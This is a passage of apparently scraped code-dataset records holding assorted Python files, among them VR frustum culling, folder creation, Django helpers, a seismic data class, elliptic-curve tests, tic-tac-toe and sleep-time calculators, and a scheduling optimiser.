_user_head_world_pos = USER_REPRESENTATION.head.WorldTransform.value.get_translate()\n _screen_world_mat = SCREEN.WorldTransform.value\n\n # if user representation is in virtual display, start intersecting from the virtual display plane\n if USER_REPRESENTATION.is_in_virtual_display():\n _head_in_screen_pos = avango.gua.make_inverse_mat(_screen_world_mat) * _user_head_world_pos\n _near_clip = abs(_head_in_screen_pos.z)\n else:\n _near_clip = SceneManager.current_near_clip\n\n _far_clip = SceneManager.current_far_clip\n\n\n # head space (but with nav orientation)\n _head_mat = SCREEN.WorldTransform.value\n _head_mat.set_translate(_user_head_world_pos)\n \n _point = avango.gua.make_inverse_mat(_head_mat) * POINT # point in head space\n _depth = abs(_point.z)\n if (_depth < _near_clip) or (_depth > _far_clip): # point in front of near plane or behind far plane --> outside frustum\n return False\n\n \n # compute screen corner points\n _screen_width = SCREEN.Width.value\n _screen_height = SCREEN.Height.value\n \n _tl_world_pos = _screen_world_mat * avango.gua.Vec3(-_screen_width * 0.5, _screen_height * 0.5, 0.0)\n _tr_world_pos = _screen_world_mat * avango.gua.Vec3(_screen_width * 0.5, _screen_height * 0.5, 0.0)\n _bl_world_pos = _screen_world_mat * avango.gua.Vec3(-_screen_width * 0.5, -_screen_height * 0.5, 0.0)\n _br_world_pos = _screen_world_mat * avango.gua.Vec3(_screen_width * 0.5, -_screen_height * 0.5, 0.0)\n\n _tl_world_pos = avango.gua.Vec3(_tl_world_pos.x, _tl_world_pos.y, _tl_world_pos.z)\n _tr_world_pos = avango.gua.Vec3(_tr_world_pos.x, _tr_world_pos.y, _tr_world_pos.z) \n _bl_world_pos = avango.gua.Vec3(_bl_world_pos.x, _bl_world_pos.y, _bl_world_pos.z)\n _br_world_pos = avango.gua.Vec3(_br_world_pos.x, _br_world_pos.y, _br_world_pos.z)\n \n ## compute lateral planes ##\n _left_plane = compute_plane(_bl_world_pos, _tl_world_pos, _user_head_world_pos)\n _distance = compute_point_plane_distance(_left_plane[0], _left_plane[1], POINT)\n if _distance < 0.0: # point in front of left plane --> outside frustum\n return False\n\n _right_plane = compute_plane(_tr_world_pos, _br_world_pos, _user_head_world_pos)\n _distance = compute_point_plane_distance(_right_plane[0], _right_plane[1], POINT)\n if _distance < 0.0: # point in front of right plane --> outside frustum\n return False\n\n _top_plane = compute_plane(_tl_world_pos, _tr_world_pos, _user_head_world_pos)\n _distance = compute_point_plane_distance(_top_plane[0], _top_plane[1], POINT)\n if _distance < 0.0: # point in front of top plane --> outside frustum\n return False\n\n _bottom_plane = compute_plane(_br_world_pos, _bl_world_pos, _user_head_world_pos)\n _distance = compute_point_plane_distance(_bottom_plane[0], _bottom_plane[1], POINT)\n if _distance < 0.0: # point in front of bottom plane plane --> outside frustum\n return False\n\n return True \n \n\n","sub_path":"lib-server/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"340055535","text":"import os\r\nimport pandas as pd\r\n\r\nfilepath = 'C:/Users/jyoo/Desktop/'\r\ndf = pd.read_csv('C:/Users/jyoo/Desktop/BM.csv',header = 0)\r\n\r\nprint(list(df.columns.values))\r\n\r\n#print(df.iloc[1,1])\r\n\r\n#print(testcase.zfill(10))\r\n\r\nfor i in range(0,len(df.index)):\r\n if not os.path.exists(filepath + str(df.iloc[i,0]).zfill(4) + '/' ):\r\n os.mkdir(filepath + str(df.iloc[i,0]).zfill(4) + '/' )\r\n\r\n#if not os.path.exists(filepath + foldername):\r\n# os.mkdir(filepath + foldername)\r\n#print(type(folders))\r\n\r\nprint(\"All Done\")\r\n","sub_path":"_Python - Create Multiple Folders.py","file_name":"_Python - Create Multiple Folders.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469799408","text":"from django import template\n\nfrom services.xml.problem import Problem\n\nfrom datetime import date as Date\nfrom typing import List, Optional\n\nregister = template.Library()\n\n\ndef format_date(date: Optional[Date]) -> str:\n if date is None:\n return ''\n return date.strftime(\"%d %b %Y\")\n\ndef end_date(problem: Problem) -> str:\n parsed_end_date = problem.parsed_end_date()\n if parsed_end_date is None:\n return \"(ended: N/A)\"\n return \"(ended: {})\".format(format_date(problem.parsed_end_date()))\n\n\ndef diagnosed_date(problem: Problem, problem_list: List[Problem]) -> str:\n dates = []\n for item in problem_list:\n dates.append(item.parsed_date())\n\n dates += [problem.parsed_date()]\n date = min(dates)\n if date:\n return \"(diagnosed: {})\".format(format_date(date))\n else:\n return ''\n\n\ndef additional_medication_dates_description(record):\n dates = []\n if record.prescribed_from:\n text = \"from: {}\".format(format_date(record.prescribed_from))\n dates += [text]\n if record.prescribed_to:\n text = \"to: {}\".format(format_date(record.prescribed_to))\n dates += [text]\n\n if any(dates):\n return \"({})\".format(' '.join(dates))\n else:\n return ''\n\n\ndef linked_problems(problem, problem_list):\n filterd_list = filter(lambda x: problem.guid() in x.target_guids(), problem_list)\n return list(filterd_list)\n\n\ndef problem_xpaths(problem, problem_link_list):\n problem_link_xpaths = []\n for link in linked_problems(problem, problem_link_list):\n problem_link_xpaths += link.xpaths()\n\n xpaths = problem.xpaths() + problem_link_xpaths\n return list(set(xpaths))\n","sub_path":"medicalreport/templatetags/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353304380","text":"# assignment is by value.\na = 0\nb = a\nb = 2\nprint (a, b)\n\n\n# method parameter pass value instead of reference.\ndef exchange(first, second):\n tmp = first\n first = second\n second = tmp\n\ni = 8\nj = 9\nexchange(i, j)\nprint (i, j)\nexit()\n\n\n\n","sub_path":"gramma/language/ValueOrAddress.py","file_name":"ValueOrAddress.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237816878","text":"#!/usr/bin/env python\n\n# package imports\nimport detectionformats.site\nimport detectionformats.source\n\n# stdlib imports\nimport json\n\n\nclass StationInfo:\n \"\"\"StationInfo - a conversion class used to create, parse, and validate\n station info data as part of detection data.\n \"\"\"\n\n # json keys\n TYPE_KEY = \"Type\"\n SITE_KEY = \"Site\"\n QUALITY_KEY = \"Quality\"\n ENABLE_KEY = \"Enable\"\n USEFORTELESEISMIC_KEY = \"UseForTeleseismic\"\n INFORMATIONREQUESTOR_KEY = \"InformationRequestor\"\n\n def __init__(\n self,\n newSite=None,\n newQuality=None,\n newEnable=None,\n newUseForTeleseismic=None,\n newInformationRequestor=None,\n ):\n \"\"\"Initialize the station info object. Constructs an empty object\n if all arguments are None\n\n Args:\n newSite: a required detectionformats.site.Site containing the desired\n site\n newLatitude: a required Number containing the latitude as a float in\n degrees\n newLongitude: a required Number containing the longitude as a float\n in degrees\n newElevation: a required Number containing the elevation as a float\n newQuality: an optional Number containing the station quality\n newEnable: an optional Boolean indicating whether the station should\n be used or not\n newUseForTeleseismic: an optional Boolean indicating whether the\n station should for teleseismic calculations or not\n newInformationRequestor: an optional detectionformats.source.Source\n containing the source of the information\n Returns:\n Nothing\n Raises:\n Nothing\n \"\"\"\n # first required keys\n self.type = \"StationInfo\"\n if newSite is not None:\n self.site = newSite\n else:\n self.site = detectionformats.site.Site()\n\n # second optional keys\n if newQuality is not None:\n self.quality = newQuality\n\n if newEnable is not None:\n self.enable = newEnable\n\n if newUseForTeleseismic is not None:\n self.useForTeleseismic = newUseForTeleseismic\n\n if newInformationRequestor is not None:\n self.informationRequestor = newInformationRequestor\n else:\n self.informationRequestor = detectionformats.source.Source()\n\n def fromJSONString(self, jsonString):\n \"\"\"Populates the object from a json formatted string\n\n Args:\n jsonString: a required String containing the json formatted text\n Returns:\n Nothing\n Raises:\n Nothing\n \"\"\"\n jsonObject = json.loads(jsonString)\n self.fromDict(jsonObject)\n\n def fromDict(self, aDict):\n \"\"\"Populates the object from a dictionary\n\n Args:\n aDict: a required dictionary\n Returns:\n Nothing\n Raises:\n Nothing\n \"\"\"\n # first required keys\n try:\n self.type = aDict[self.TYPE_KEY]\n self.site.fromDict(aDict[self.SITE_KEY])\n except (ValueError, KeyError, TypeError) as e:\n print(\"Dict format error, missing required keys: %s\" % e)\n\n # second optional keys\n if self.QUALITY_KEY in aDict:\n self.quality = aDict[self.QUALITY_KEY]\n\n if self.ENABLE_KEY in aDict:\n self.enable = aDict[self.ENABLE_KEY]\n\n if self.USEFORTELESEISMIC_KEY in aDict:\n self.useForTeleseismic = aDict[self.USEFORTELESEISMIC_KEY]\n\n if self.INFORMATIONREQUESTOR_KEY in aDict:\n self.informationRequestor.fromDict(aDict[self.INFORMATIONREQUESTOR_KEY])\n\n def toJSONString(self):\n \"\"\"Converts the object to a json formatted string\n\n Args:\n None\n Returns:\n The JSON formatted message as a String\n Raises:\n Nothing\n \"\"\"\n jsonObject = self.toDict()\n\n return json.dumps(jsonObject, ensure_ascii=False)\n\n def toDict(self):\n \"\"\"Converts the object to a dictionary\n\n Args:\n None\n Returns:\n The dictionary\n Raises:\n Nothing\n \"\"\"\n aDict = {}\n\n # first required keys\n try:\n aDict[self.TYPE_KEY] = self.type\n aDict[self.SITE_KEY] = self.site.toDict()\n except (NameError, AttributeError) as e:\n print(\"Missing required data error: %s\" % e)\n\n # second optional keys\n if hasattr(self, \"quality\"):\n aDict[self.QUALITY_KEY] = self.quality\n\n if hasattr(self, \"enable\"):\n aDict[self.ENABLE_KEY] = self.enable\n\n if hasattr(self, \"useForTeleseismic\"):\n aDict[self.USEFORTELESEISMIC_KEY] = self.useForTeleseismic\n\n if hasattr(self, \"informationRequestor\"):\n aDict[self.INFORMATIONREQUESTOR_KEY] = self.informationRequestor.toDict()\n\n return aDict\n\n def isValid(self):\n \"\"\"Checks to see if the object is valid\n\n Args:\n None\n Returns:\n True if the object is valid, False otherwise\n Raises:\n Nothing\n \"\"\"\n errorList = self.getErrors()\n\n return not errorList\n\n def getErrors(self):\n \"\"\"Gets a list of object validation errors\n\n Args:\n None\n Returns:\n A List of Strings containing the validation error messages\n Raises:\n Nothing\n \"\"\"\n errorList = []\n\n # first required keys\n try:\n if self.type == \"\":\n errorList.append(\"Empty Type in StationInfo Class.\")\n elif self.type != \"StationInfo\":\n errorList.append(\"Non-StationInfo Type in StationInfo Class.\")\n except (NameError, AttributeError):\n errorList.append(\"No Type in StationInfo Class.\")\n\n try:\n if not self.site.isValid():\n errorList.append(\"Invalid Site in StationInfo Class.\")\n except (NameError, AttributeError):\n errorList.append(\"No Site in StationInfo Class.\")\n\n try:\n if self.site.latitude < -90 or self.site.latitude > 90:\n errorList.append(\n \"Latitude in StationInfo Class not in the range of -90 to 90.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Latitude in StationInfo Class.\")\n\n try:\n if self.site.longitude < -180 or self.site.longitude > 180:\n errorList.append(\n \"Longitude in StationInfo Class not in the range of -180 to 180.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Longitude in StationInfo Class.\")\n\n try:\n if self.site.elevation < -550 or self.site.elevation > 8900:\n errorList.append(\n \"Elevation in StationInfo Class not in the range of -550 to 8900.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Elevation in StationInfo Class.\")\n\n # second optional keys\n if hasattr(self, \"informationRequestor\"):\n if not self.informationRequestor.isValid():\n errorList.append(\"Invalid InformationRequestor in StationInfo Class.\")\n\n return errorList\n","sub_path":"python/detectionformats/stationinfo.py","file_name":"stationinfo.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"580156394","text":"from unittest import TestCase\nfrom crypto.fieldelement import FieldElement\nfrom crypto.point import Point\n\n\nclass EecTest(TestCase):\n def test_field_elements_on_curve(self):\n prime = 223\n a = FieldElement(0, prime)\n b = FieldElement(7, prime)\n valid_points = ((192, 105), (17, 56), (1, 193))\n invalid_points = ((200, 119), (42, 99))\n for x_raw, y_raw in valid_points:\n x = FieldElement(x_raw, prime)\n y = FieldElement(y_raw, prime)\n Point(x, y, a, b)\n for x_raw, y_raw in invalid_points:\n x = FieldElement(x_raw, prime)\n y = FieldElement(y_raw, prime)\n with self.assertRaises(ValueError):\n Point(x, y, a, b)\n\n def test_add_for_field_points(self):\n prime = 223\n a = FieldElement(0, prime)\n b = FieldElement(7, prime)\n p1 = Point(FieldElement(170, prime), FieldElement(142, prime), a, b)\n p2 = Point(FieldElement(60, prime), FieldElement(139, prime), a, b)\n p_result = Point(FieldElement(220, prime), FieldElement(181, prime), a, b)\n self.assertTrue(p1 + p2 == p_result)\n p1 = Point(FieldElement(47, prime), FieldElement(71, prime), a, b)\n p2 = Point(FieldElement(17, prime), FieldElement(56, prime), a, b)\n p_result = Point(FieldElement(215, prime), FieldElement(68, prime), a, b)\n self.assertTrue(p1 + p2 == p_result)\n p1 = Point(FieldElement(143, prime), FieldElement(98, prime), a, b)\n p2 = Point(FieldElement(76, prime), FieldElement(66, prime), a, b)\n p_result = Point(FieldElement(47, prime), FieldElement(71, prime), a, b)\n self.assertTrue(p1 + p2 == p_result)\n\n","sub_path":"tests/crypto/eectest.py","file_name":"eectest.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98215222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 9 18:50:21 2021\r\n\r\n@author: andya\r\n\"\"\"\r\nN = 15\r\ndef get_prime_divisor(N):\r\n prime_list = []\r\n for i in range(2, N + 1):\r\n # all prime numbers are greater than 1\r\n if i > 1 and N%i == 0:\r\n for j in range(2, i):\r\n if (i % j) == 0:\r\n break\r\n else:\r\n prime_list.append(i)\r\n return prime_list\r\n\r\ndef solution(A, B):\r\n \r\n answer = 0\r\n for i in range(len(A)):\r\n A_list = get_prime_divisor(A[i])\r\n B_list = get_prime_divisor(B[i])\r\n \r\n if A_list == B_list:\r\n answer += 1\r\n return answer\r\n\r\nsolution(A,B)","sub_path":"12_2_CommonPrimeDivisors.py","file_name":"12_2_CommonPrimeDivisors.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503421401","text":"def prepare_report_request(facebook, report):\n result = dict()\n result[\"level\"] = report[\"level\"]\n fields = report[\"fields\"].copy()\n if report.get(\"filtering\"):\n result[\"filtering\"] = report.get(\"filtering\")\n if report.get(\"action_attribution_windows\"):\n result[\"action_attribution_windows\"] = report.get(\"action_attribution_windows\")\n if report.get(\"action_report_time\"):\n result[\"action_report_time\"] = report.get(\"action_report_time\")\n if 'account_id' not in fields:\n fields.append('account_id')\n if \"purchase\" in fields:\n fields[fields.index(\"purchase\")] = \"actions\"\n elif \"total_actions\" in fields:\n fields[fields.index(\"total_actions\")] = \"actions\"\n if \"video_view_10_sec\" in fields:\n fields[fields.index(\"video_view_10_sec\")] = \"video_10_sec_watched_actions\"\n if \"updated_time\" not in fields:\n fields.append(\"updated_time\")\n fields = \", \".join(fields)\n result[\"fields\"] = fields\n if report.get(\"breakdowns\"):\n breakdowns = [b for b in report[\"breakdowns\"]]\n breakdowns = \", \".join(breakdowns)\n else:\n breakdowns = None\n result[\"breakdowns\"] = breakdowns\n if report.get('ad_accounts'):\n accounts = report.get('ad_accounts')\n query = \"SELECT DISTINCT id, app_system_user_id, account_id FROM %s.ad_accounts WHERE id in ('%s')\"\n query = query % (facebook.config[\"schema_name\"], \"','\".join(accounts))\n else:\n query = \"SELECT DISTINCT id, app_system_user_id, account_id FROM %s.ad_accounts\"\n query = query % facebook.config[\"schema_name\"]\n accounts = facebook.dbstream.execute_query(query=query)\n result[\"accounts\"] = accounts\n return result\n","sub_path":"pyfbook/core/marketing/extract/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588087689","text":"import unittest\n\nfrom app.main import db\nimport json\nfrom app.test.base import BaseTestCase\n\nclass TestSpacyBlueprint(BaseTestCase):\n maxDiff = None\n\n def test_spacy(self):\n with self.client:\n response = self.client.post(\n '/spacy/',\n data=json.dumps(dict(\n text='Pastafarians are smarter than people with Coca Cola bottles.',\n model='en'\n )),\n content_type='application/json'\n )\n self.assertEqual('application/json', response.content_type)\n self.assertEqual(200, response.status_code)\n data = json.loads(response.data.decode())\n self.assertDictEqual(json.load(open('./app/test/data/spacy.json')), data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"app/test/test_spacy.py","file_name":"test_spacy.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172691368","text":"#!/usr/bin/env python3\nfrom sys import stdin\n\nn = int(stdin.readline())\n\ndef column(b, col):\n ret = ''\n for i in b:\n ret += i[col]\n return ret\n\ndef check_array(b):\n # Check rows\n for i in range(4):\n if b[i].count('X') + b[i].count('T') == 4:\n return 'X won'\n if b[i].count('O') + b[i].count('T') == 4:\n return 'O won'\n # Check cols\n for i in range(4):\n if column(b,i).count('X') + column(b,i).count('T') == 4:\n return 'X won'\n if column(b,i).count('O') + column(b,i).count('T') == 4:\n return 'O won'\n # Check diags\n x1 = o1 = x2 = o2 = t1 = t2 = 0\n for i in range(4):\n x1 += int(b[i][i] == 'X')\n x2 += int(b[i][3-i] == 'X')\n o1 += int(b[i][i] == 'O')\n o2 += int(b[i][3-i] == 'O')\n t1 += int(b[i][i] == 'T')\n t2 += int(b[i][3-i] == 'T')\n if x1 + t1 == 4 or x2 + t2 == 4:\n return 'X won'\n if o1 + t1 == 4 or o2 + t2 == 4:\n return 'O won'\n # Count dots\n dots = 0\n for i in b:\n dots += i.count('.')\n if dots != 0:\n return 'Game has not completed'\n else:\n return 'Draw'\n\nfor k in range(1, n+1):\n # Read array\n b = []\n for i in range(4):\n b.append(stdin.readline())\n stdin.readline()\n\n print('Case #', k, ': ', check_array(b), sep='')\n\n","sub_path":"solutions_2453486_1/Python/rasen/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279587733","text":"# user enters sleep timing, wants to check wake up timing\n\ndef handle_overflow_minutes(minutes):\n overflow_hour = 0\n if minutes >= 60:\n overflow_hour = 1\n minutes = minutes - 60\n return overflow_hour, minutes\n return overflow_hour, minutes\n\ndef handle_overflow_hours(hours):\n if hours == 24:\n return 0\n if hours >= 24:\n return hours-24\n return hours\n\ndef convert_to_string_len_2(int_value):\n int_str = str(int_value)\n if len(int_str) < 2:\n int_str = '0' + int_str\n return int_str\n else:\n return int_str\n\ndef main_calculation(user_time, rem_sleep_timings):\n sleep_prep_time = 15\n sleep_timings_return = []\n\n user_hours = int(user_time[:2])\n user_minutes = int(user_time[2:])\n\n for time in rem_sleep_timings:\n rem_minutes = int((time - (time//1))*60)\n rem_hours = int(time//1)\n\n # execute add timings\n minutes = user_minutes + rem_minutes + sleep_prep_time\n overflow_hour, minutes = handle_overflow_minutes(minutes)\n hours = user_hours + rem_hours + overflow_hour\n hours = handle_overflow_hours(hours)\n\n str_to_append = convert_to_string_len_2(hours) + convert_to_string_len_2(minutes)\n sleep_timings_return.append(str_to_append)\n\n return sleep_timings_return\n\n# main function execution\ndef sleep_calculator(user_time):\n user_time = user_time.strip()\n rem_sleep_timings = [1.5, 3.0, 4.5, 6.0, 7.5, 9.0, 10.5]\n sleep_timings_list = main_calculation(user_time, rem_sleep_timings)\n return sleep_timings_list\n\nif __name__ == '__main__':\n user_time = input('Enter timing >>> ')\n print(sleep_calculator(user_time))","sub_path":"wake.py","file_name":"wake.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"210417645","text":"# Inheritance\nclass User:\n def log(self):\n print(self) # => AttributeError: 'Customer' object has no attribute 'log'\n # you'll get an error unless you pass User as a parameter for the Custoer class\n\n# Polymorphism \nclass Teacher(User):\n def log(self):\n print(\"I'm a teacher\")\n\nclass Customer(User): # initialize the parameters below\n # Initialize method\n def __init__(self, name, membership):\n self.name = name\n self.membership = membership\n\n # we're going to make name a property with two methods\n @property\n def name(self):\n return self._name #this is private\n\n @name.setter\n def name(self, name):\n self._name = name\n\n @name.deleter # this deletes the name attribute from the customer class\n def name(self):\n del self._name\n\n def update_membership(self, new_membership):\n print(\"Calculating costs\")\n self.membership = new_membership\n\n # printing all the customers method with NO SELF\n def print_all_customers(customers):\n for customer in customers:\n print(customer)\n\n # this method will converst a customer to a string\n def __str__(self):\n return self.name + \" \" + self.membership\n\n # Equals method\n def __eq__(self, other):\n if self.name == other.name and self.membership == other.membership:\n return True\n \n return False\n\n __hash__ = None\n\n __repr__ = __str__\n\n\n# # create the customer like this\n# jurgen = Customer(\"Jurgen\", \"Premium\")\n# print(jurgen.name, jurgen.membership)\n# # another example of creating a customer\n# caleb = Customer(\"Caleb\", \"Bronze\")\n# print(caleb.name, caleb.membership)\n\n\n# you can create a list of objects created with the class. They're arguments\ncustomers = [Customer(\"Jurgen\", \"Premium\"), \n Customer(\"Caleb\", \"Bronze\"),\n Teacher()]\n\nprint(customers[1].name) # => Caleb\n\n# Custom Methods\n# customers[1].verified = False\n# print(customers[1].verified) # => False\n\n# Use Custom Method to update the membership\n# print(customers[1].membership) # => Bronze\n# customers[1].update_membership(\"Gold\")\n# print(customers[1].membership) # => Gold \n\n# convert customer to string\nprint(customers[1]) # Caleb Bronze\ncustomers[1].update_membership(\"Gold\")\nprint(customers[1]) # => Caleb Gold\n\n#Print all of the customers\nCustomer.print_all_customers(customers)\n# => Jurgen Premium\n# Caleb Bronze\n\n# Equals\nprint(customers[0] == customers[1]) # False\n\nprint(customers) # => [Jurgen Premium, Caleb Gold]\n\n# Encapsulation - The whole idea behind it is you can hide the inner details of a class or certain data.\n# and you only need to share or expose what is needed for the user of the class to use this class\n\n# Inheritance - Allows us to have certain attributes for objects because they're defined in a base class\n\n# Polymorphism - It's the same thing as inheritance except special abilities/methods can be added to each individual object\n\ncustomers[0].log() # => Jurgen Premium\n\ncustomers[2].log()\n\nusers = [Customer(\"Jurgen\", \"Premium\"),\n Customer(\"Caleb\", \"Bronze\"),\n Teacher()]\n\n# loop the log for each user in the array of users\nfor user in users:\n user.log()","sub_path":"python-oop.py","file_name":"python-oop.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33663","text":"import numpy as np\nimport pandas as pd\nimport random as rd\nimport copy\nimport matplotlib.pyplot as plt\nimport sys\n\nfam = np.asarray(pd.read_csv('family_data.csv').values)\n\nn_days = 100\nmax_occupancy = 300\nmin_occupancy = 125\ndays = np.arange(n_days) + 1\npenalty_const = [0,50,50,100,200,200,300,300,400,500,500]\npenalty_term1 = [0,0,9,9,9,18,18,36,36,235,434]\n\ndef cost(schedule):\n penalty, occupancy, day_cost = 0, {k: 0 for k in days}, {k: 0 for k in days}\n fam_prefs = {}\n fam_costs = []\n\n for assignment in schedule:\n family, day = assignment[0], assignment[1]\n\n choices = fam[fam[:,0] == family][0]\n choices2, n_members = choices[1:-1], choices[-1]\n if family not in fam_prefs.keys():\n fam_prefs[family] = {'n_members': n_members, 'choices': choices2}\n pref = np.where(choices2 == day)\n pref = 10 if len(pref[0]) == 0 else pref[0][0]\n penalty = penalty + penalty_const[pref] + n_members*penalty_term1[pref]\n occupancy[day] += n_members\n day_cost[day] += penalty_const[pref] + n_members*penalty_term1[pref]\n fam_costs.append((family, penalty))\n\n for i in days:\n if occupancy[i] > max_occupancy or (occupancy[i] < min_occupancy):\n penalty += 10000000000000\n\n accounting_cost = (occupancy[n_days] - min_occupancy) / 400.0 * occupancy[n_days]**0.5\n day_cost[n_days] += (occupancy[n_days] - min_occupancy) / 400.0 * occupancy[n_days]**0.5\n accounting_cost = max(0, accounting_cost)\n for i in range(len(days) - 1, -1):\n accounting_cost += (occupancy[i] - min_occupancy) / 400.0 * occupancy[i]**(0.5 + np.sqrt( (occupancy[i] - occupancy[i+1])**2))\n day_cost[i] += (occupancy[i] - min_occupancy) / 400.0 * occupancy[i]**(0.5 + np.sqrt( (occupancy[i] - occupancy[i+1])**2))\n\n penalty += accounting_cost\n return penalty, np.asarray(fam_costs), occupancy, fam_prefs, day_cost\n\ndef make_guess(schedule, fc):\n fam_day_costs = np.hstack((schedule, fc[:,1:]))\n fam_day_costs.view('i8,i8,i8').sort(order=['f2'], axis=0)\n return fam_day_costs[::-1]\n\ndef make_sched():\n bymems = []\n for i in fam_prefs.keys():\n cv = [i]\n cv.append(fam_prefs[i]['n_members'])\n bymems.append(cv)\n bymems = np.array(bymems)\n bymems.view('i8,i8').sort(order=['f1','f0'], axis=0)\n bymems = bymems[::-1]\n\n occ = {k:0 for k in days}\n\n sched = []\n not_scheduled = []\n for i in range(bymems.shape[0]):\n found = 0\n for j in range(len(fam_prefs[bymems[i][0]]['choices'])):\n if (occ[fam_prefs[bymems[i][0]]['choices'][j]] < max_occupancy - bymems[i][1]) and found == 0:\n sched.append([bymems[i][0], fam_prefs[bymems[i][0]]['choices'][j]])\n found = 1\n occ[fam_prefs[bymems[i][0]]['choices'][j]] += bymems[i][1]\n if found == 0:\n not_scheduled.append(i)\n\n for i in not_scheduled:\n scheduled = 0\n for key in occ.keys():\n if occ[key] < max_occupancy - bymems[i][1] and occ[key] + bymems[i][1] >= min_occupancy and scheduled == 0:\n sched.append([bymems[i][0], key])\n occ[key] += bymems[i][1]\n scheduled = 1\n return np.asarray(sched)\n\ninit = [[j, rd.randint(1,n_days)] for j in range(len(fam))]\ntotal_cost, fam_costs, occ, fam_prefs, day_costs = cost(init)\n#start = make_sched()\nstart = np.asarray(init)\ntotal_cost, fam_costs, occ, fam_prefs, day_costs = cost(start)\nday_costs = np.asarray([[m,day_costs[m]] for m in day_costs.keys()])\nday_costs.view('i8,i8').sort(order=['f1'], axis=0)\nday_costs = day_costs[::-1]\n\nprint(total_cost)\ntotal_cost2 = 100000000000000000\nfor i in range(100):\n not_scheduled = []\n temp = start.copy()\n\n\n for j in range(10):\n occ[day_costs[j,0]] = 0\n occ[day_costs[j,0]] = 0\n occ[day_costs[j,0]] = 0\n for j in range(10):\n fams_toberescheduled = temp[temp[:,1] == day_costs[j,0]][:,0]\n for k in range(fams_toberescheduled.shape[0]):\n found = 0\n try:\n fam_prefs[fams_toberescheduled[k]]['choices'].remove(day_costs[j,0])\n except:\n pass\n for l in range(len(fam_prefs[fams_toberescheduled[k]]['choices'])):\n if found == 0 and (occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] < max_occupancy - fam_prefs[fams_toberescheduled[k]]['n_members']) and (occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] > min_occupancy) and (fam_prefs[fams_toberescheduled[k]]['choices'][l] != day_costs[j,0]):\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = fam_prefs[fams_toberescheduled[k]]['choices'][l]\n occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] += fam_prefs[fams_toberescheduled[k]]['n_members']\n if found == 0:\n not_scheduled.append(fams_toberescheduled[k])\n for familia in not_scheduled:\n found= 0\n for dia in occ.keys():\n if dia != day_costs[j,0] and found ==0 and occ[dia] > min_occupancy and occ[dia] < max_occupancy - fam_prefs[familia]['n_members']:\n occ[dia] += fam_prefs[familia]['n_members']\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = dia\n if found == 0:\n for dia in occ.keys():\n if dia != day_costs[j,0] and found ==0 and occ[dia] < max_occupancy - fam_prefs[familia]['n_members']:\n occ[dia] += fam_prefs[familia]['n_members']\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = dia\n total_cost2, fam_costs2, occ2, fam_prefs2, day_cost2 = cost(temp)\n print(total_cost2)\n if total_cost <= total_cost2:\n total_cost = total_cost2\n occ = occ2\n fam_costs = fam_costs2\n #fam_prefs = fam_prefs2\n day_costs = day_cost2\n day_costs = np.asarray([[m,day_costs[m]] for m in day_costs.keys()])\n day_costs.view('i8,i8').sort(order=['f1'], axis=0)\n day_costs = day_costs[::-1]\n start=temp\n print(sum(start - temp))\n\n\nsched = np.asarray(start, dtype=int)\nf = open('sub.csv', 'w')\nf.write('family_id,assigned_day\\n')\nfor i in range(len(sched)):\n f.write('{},{}\\n'.format(int(sched[i][0]), int(sched[i][1])))\nf.close()\n","sub_path":"sgd_elf.py","file_name":"sgd_elf.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"100923333","text":"from sklearn.ensemble import RandomForestRegressor, AdaBoostRegressor\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom xgboost import XGBRegressor\r\nfrom catboost import CatBoostRegressor\r\nimport sklearn\r\nfrom sklearn.metrics import *\r\nfrom category_encoders import TargetEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom onepiecepredictor.OnePiecePredictor2 import OnePiecePredictor3\r\n\r\nclass OnePieceRegression(OnePiecePredictor3):\r\n \"\"\"\r\n For hyper parameter tuning with cross validation and stratified splitting of data if required.\r\n\r\n X -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n Y -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n model -> string Currently supported models: 